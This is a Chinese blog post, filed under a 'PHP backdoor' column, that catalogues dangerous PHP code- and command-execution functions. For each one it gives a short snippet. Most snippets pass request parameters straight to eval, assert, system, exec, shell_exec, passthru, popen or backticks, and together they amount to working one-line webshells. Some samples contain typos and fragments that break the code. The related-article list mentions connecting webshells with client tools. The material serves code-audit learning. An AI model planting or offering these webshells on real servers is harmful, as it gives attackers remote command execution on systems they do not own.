PHP危险函数

已于 2023-10-25 20:25:07 修改
阅读量439 收藏
点赞数
分类专栏: PHP 后门 文章标签: php 开发语言 web安全
于 2023-10-25 20:24:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70137901/article/details/134037375
版权

PHP危险函数

文章目录


通过构造函数可以执行系统命令达到非法控制计算机被视为危险函数

PHP 代码执行函数

字符串当中PHP代码来执行

eval 语句

eval() 会将符合PHP 语法规范字符串当作php 代码执行

这个语句只能执行php代码不能执行系统命令但能调用system()函数来实现系统命令

$code = $_REQUEST['code'];
eval($code);

通过简写就是一句话木马的原型

@eval($ REQUEST['code']);

也可以嵌入eval(eval());的形式来执行

assert()语句
  • assert() 只能执行单条PHP 语句
  • 在低版本中assert() 是一个函数,可以动态调用。
  • 高版本PHP 中,7.2.0被弃用在8.0.0的assert语句已经被淘汰了
$code=$_REQUEST['code'];
assert($code);

因为每次只能执行一条语句如果想实现一句话木马可以以编码的形式进行
在这里插入图片描述

preg_replace()函数

preg_replace 执行一个正则表达式的搜索和替换

正则表达式:一类字符特征

preg_replace(“/正则表达式/修饰符”,“要替换的字符”,“目标字符串”)

在第二个参数里"\\1"是第一个匹配到的字符

正则表达式里

.*是表示匹配所有

修饰符

i匹配大小写

e将匹配到符合php代码的字符执行

回调函数

一个函数调用另外一个函数。PHP 语言中回调函数有很多。

call_user_func()函数

特点

  • 只能调用函数
  • 不能用结构语句

用assert执行phpinfo函数

$func = 'assert';
$arg = "phpinfo();";
call_user_func($func, $arg);
array_map()函数

参数必须为数组

$func = 'assert';
$arg[] = "phpinfo();";
array_map($func, $arg);

OS命令执行函数

OS命令执行函数:把字符串当作系统命令执行

system()函数

是一个典型的系统命令执行函数

特点

  • 自带输出功能
  • 自动区分系统平台
<?php
    $cmd=$_REQUEST['cmd'];
	system($cmd);
    ?>
exec()函数

将字符串当作代码执行

特点:

  • 能执行系统命令
  • 不自带输出
  • 只输出命令执行结果的最后一行
<?php
    $cmd = "ipconfig";
	var_dump(exec($cmd));
    ?>
shell_exec()函数

特点:

  • 通过 shell 执行命令并将完整的输出以字符串的方式返回
  • 不自带输出
<?php
    $cmd =$_REQUEST["cmd"];
	echo shell_exec($cmd);
    ?>
passthru() 函数

执行外部程序并且显示原始输出
特点

  • 能执行系统命令
  • 自带输出功能
<?php   
    $cmd =$_REQUEST["cmd"];    		passthru($cmd); 
?>
popen 函数

特点

  • 把命令结果当作成一个文件
  • 不自带输出功能
  • 函数返回值为文件指针,可以简单理解为文件名

想要输出结果要使用fread函数有两个参数一个是要读的文件另一个是字节数
在这里插入图片描述
模式。‘r’ 表示阅读,‘w’ 表示写入。

<?php
    $cmd=$_REQUEST["cmd"];
	$result=popen($cmd,"r");
	echo fread($resukt,1024);
反引号``

反引号` 内的字符串,会被解析成OS 命令。


$cmd = "whoami";
$cmd = "ipconfig";
$cmd = "net user";
echo "<pre>".`$cmd`;
n($cmd,"r");
	echo fread($resukt,1024);

实列

  1. system
    以字符串的形式执行系统命令并自带回显
<?php
    system($_GET['cmd']);
?>

在这里插入图片描述
2. exec
用字符串的形式执行系统命令不自带回显,用echo只能输出末一行用来确认代码是否执行成功

<?php 
   echo exec($_REQUEST['cmd']);
?>

在这里插入图片描述
3. shell_exec
通过 shell 执行命令后并将完整的输出以字符串的方式返回
函数本身不自带回显功能

<?php 
  echo shell_exec($_REQUEST['cmd']);
?>

在这里插入图片描述
4. passthru
执行外部程序并且显示原始输出

<?php 
  passthru ($_REQUEST['cmd']);
?>

在这里插入图片描述
5. popen
打开一个指向进程的管道,该进程由派生给定的 command 命令执行而产生。

<?php
echo fread(popen($_REQUEST['cmd'],'r'),1024);
?>

在这里插入图片描述

  1. ``反引号
    反引号` 内的字符串,会被解析成OS 命令
<?php
    $a=$_REQUEST['cmd'];
    echo `$a`;
?>

在这里插入图片描述
7. eval
eval() 会将符合PHP 语法规范字符串当作php 代码执行

<?php
echo @eval ($_REQUEST['cmd']);
?>

在这里插入图片描述

  1. assert
<?php
	assert($_REQUEST['cmd']);
	?>

在这里插入图片描述

  1. preg_replace
<?php
   echo  preg_replace('~\[(.*)\]~e','\\1','[phpinfo()]');  
?>

在这里插入图片描述

  1. call_user_func
<?php
    call_user_func('assert','phpinfo()');
?>

在这里插入图片描述

  1. array_map
    只能执行数组
<?php
    $a[]=phpinfo();
    array_map(assert(),$a);
?>

在这里插入图片描述

  1. 动态函数
$func="system";
$func2="ipconfig";
$func($func2);

在这里插入图片描述

抠脚大汉在网络
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php 断言,PHP 断言(assert) 详解
weixin_31180441的博客
03-12 2127
PHP 中的断言常用于调试,检查一个表达式或语句是否为 FALSE。本文带你重新认识 PHP assert() 函数的神(Qi)通(Yin)广(Ji)大(Qiao)。本文基于 PHP Version 7.1.28什么是断言编写程序时,常会做出一定的假设,那断言就是用来捕获假设的异常,我们也可以认为断言是异常的一种特殊形式。断言一般用于程序执行结构的判断,不可让断言处理业务流程。用的最多的场景就是单...
php assert执行命令,代码执行&命令执行&命令注入
weixin_33962315的博客
03-19 1995
代码执行&命令执行&命令注入代码执行代码执行是靠脚本代码调用操作系统的命令evaleval( string $code) : mixed把字符串 code 作为PHP代码执行。eval($_POST['c']);直接蚁剑链接密码为c 中国菜刀 cknifeassertassert( mixedexception]) : bool如果 assertion 是字符串,它将会被 ass...
PHP危险函数解析:保护程序免受攻击
Sgirll的博客
06-08 902
PHP 中有一些函数是比较危险的,也是进行PHP 代码审计的时候需要重点关注的内容。
php断言什么意思,PHP断言(ASSERT)的用法
weixin_32568425的博客
04-12 2262
简述编写代码时,我们总是会做出一些假设,断言就是用于在代码中捕捉这些假设,可以将断言看作是异常处理的一种高级形式。程序员断言在程序中的某个特定点该的表达式值为真。如果该表达式为假,就中断操作。可以在任何时候启用和禁用断言验证,因此可以在测试时启用断言,而在部署时禁用断言。同样,程序投入运行后,最终用户在遇到问题时可以重新起用断言。使用断言可以创建更稳定,品质更好且不易于出错的代码。单元测试必须使用...
phpassert函数的用法
Lankecms
07-04 2422
assert这个函数php语言中是用来判断一个表达式是否成立。返回true or false; 例如 $s = 123; assert("is_int($s)"); ?> 从这个例子可以看到字符串参数会被执行,这跟eval()类似。不过eval($code_str)只是执行符合php编码规范的$code_str。 assert的用法却更详细一点。 assert_opti
PHP危险函数总结
Lemon's blog
08-17 3866
前言:PHP中有很多危险函数,如phpinfo() ,这次就来详细总结一下PHP中的危险函数,方便以后学习。 一、PHP代码执行函数 eval()函数 定义和用法: eval() 函数把字符串按照 PHP 代码来计算. 该字符串必须是合法的 PHP 代码,且必须以分号结尾。 这个用法就会产生漏洞,通过一个例子来看一下: <?php $var = "var"; if (isset($_GE...
php危险函数2
m0_55772907的博客
09-06 774
php危险函数2
一些需要禁用的PHP危险函数(disable_functions)
10-28
以下是一些常见的需要禁用的PHP危险函数及其详细解释: 1. `phpinfo()`: 这个函数会输出关于PHP环境的详细信息,包括服务器配置、模块版本等,暴露过多系统信息可能增加被攻击的风险。 2. `passthru()`: 它允许...
PHP 危险函数全解析
10-29
PHP中的危险函数全解析,阅读PHP中的危险函数全解析,在编译 PHP 时,如无特殊需要,一定禁止编译生成 CLI 命令行模式的 PHP 解析支持。
PHP 危险函数解释 分析
10-30
PHP编程中,有一些函数由于其特殊的性质,可能被恶意用户利用来执行危险操作,因此被称为“危险函数”。这些函数如果被不小心或者未经授权地使用,可能导致严重的安全问题,例如执行任意系统命令、泄露敏感信息...
assert函数_PHPassert()函数
weixin_39976166的博客
11-27 905
assert()函数其实是一个断言函数。那么什么是断言呢?百度百科上是这么说的:编写代码时,我们总是会做出一些假设,断言就是用于在代码中捕捉这些假设。说到这里,大家应该能知道assert()函数是干嘛用的了吧?好,接下来我们看一下PHP官方文档是怎么解释的:assert — 检查一个断言是否为 FALSEPHP assert() 会检查指定的 assertion 并在结果为 FALSE 时采取适当...
PHP断言(ASSERT)的用法
weixin_30849591的博客
07-10 471
简述 编写代码时,我们总是会做出一些假设,断言就是用于在代码中捕捉这些假设,可以将断言看作是异常处理的一种高级形式。程序员断言在程序中的某个特定点该的表达式值为真。如果该表达式为假,就中断操作。 可以在任何时候启用和禁用断言验证,因此可以在测试时启用断言,而在部署时禁用断言。同样,程序投入运行后,最终用户在遇到问题时可以重新起用断言。 使用断言可以创建更稳定,品质更好且不易于出错的代码。单元测试必...
php assert执行命令,php中代码执行&&命令执行函数
weixin_33603963的博客
03-19 2263
一、PHP代码执行函数1、eval()函数#传入的参数必须为PHP代码,既需要以分号结尾。#命令執行:cmd=system(whoami);#菜刀连接密码:cmd那么当我们上传了eval函数的菜刀马之后,在连接不上菜刀的情况下怎么上传大马呢?继续往下看这里我是先写一个上传马,再用上传马去上传大马,有点多次一举,但是考虑到大马代码量太多,还是建议先写个上传马,以下代码只有1kb。@$temp = $...
< php assert,assert用于PHP的debug
weixin_28704239的博客
03-31 217
在说assert之前,先说一下assert的选项配置函数assert_options()。mixed assert_options ( int $what [, mixed $value ] )常量 INI设置 默认值 描述ASSERT_ACTIVE assert.active 1启用 assert() 断言ASSERT_...
assert()函数_Web渗透 之 PHP 函数
weixin_39711721的博客
12-28 551
后台代码 - PHP 函数函数就是可以完成固定功能的语句或语句集合,可以重复调用。0x01 自定义函数函数定义的语法function 函数名([形式参数1,形式参数2,....形式参数n]){ //函数体 return 表达式;//也可以不返回,如果不写那么默认返回null } function 是PHP 的关键字,用于完成函数的定义函数名,避开PHP 关键字,命名规则与变量的命名...
php中的几个执行函数以及assert()函数,正则匹配的反向引用
veinard_F的博客
05-06 715
eval() 该函数是把字符串当作php代码执行,从它的功能来看可以感觉到这个函数会存在安全问题,任何一个字符串只要用了该函数,就可以被执行,所以不要随便用一个未经验证的数据通过该函数传入。 eval(string $code) 参数: 字符串中不可以包含’<?php 啥啥; ?>’(php tags),但对于正常的php代码的离开,进入,如’啥啥啥;?>n HTML mode!...
PHP 选项/信息 函数-assert()
天行健,君子自强不息
08-21 704
assert这个函数php语言中是用来判断一个表达式是否成立。返回true or false; 例如 $s = 123; assert("is_int($s)"); ?> 从这个例子可以看到字符串参数会被执行,这跟eval()类似。不过eval($code_str)只是执行符合php编码规范的$code_str。assert的 用法却更详细一点。assert_opti
PHP代码审计
最新发布
2301_76786857的博客
03-11 1166
本文章主要是PHP代码审计的一些基础知识,包括函数的用法,漏洞点,偏向基础部分,个人能力有限,部分可能会出现错误或者遗漏,读者可自行补充。看完这里不知道你对代码审计中的代码执行部分是否有另一种想法?我的想法就是这个是和后门联系在一起的。我们可以看到很多函数都具有构造执行命令的条件,而且其中很多函数也的确被用在后门中,特别像后面几个回调函数,在后门中更是常见。当然这些后门函数也早已被安全厂商盯住,所以大部分已经无法直接免杀,所以想要免杀就需要结合其他姿势,比如替换、拼接、加密等等。
PHP危险函数都哪些
04-25
PHP危险函数主要包括以下几种: 1. eval() 2. exec() 3. system() 4. passthru() 5. shell_exec() 6. popen() 7. proc_open() 8. fsockopen() 9. stream_socket_client() 10. pdo->query()(当用于传递未经过滤的参数时) 这些函数都可以用来执行任意命令或脚本,所以在编写 PHP 代码时要特别小心使用这些函数

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值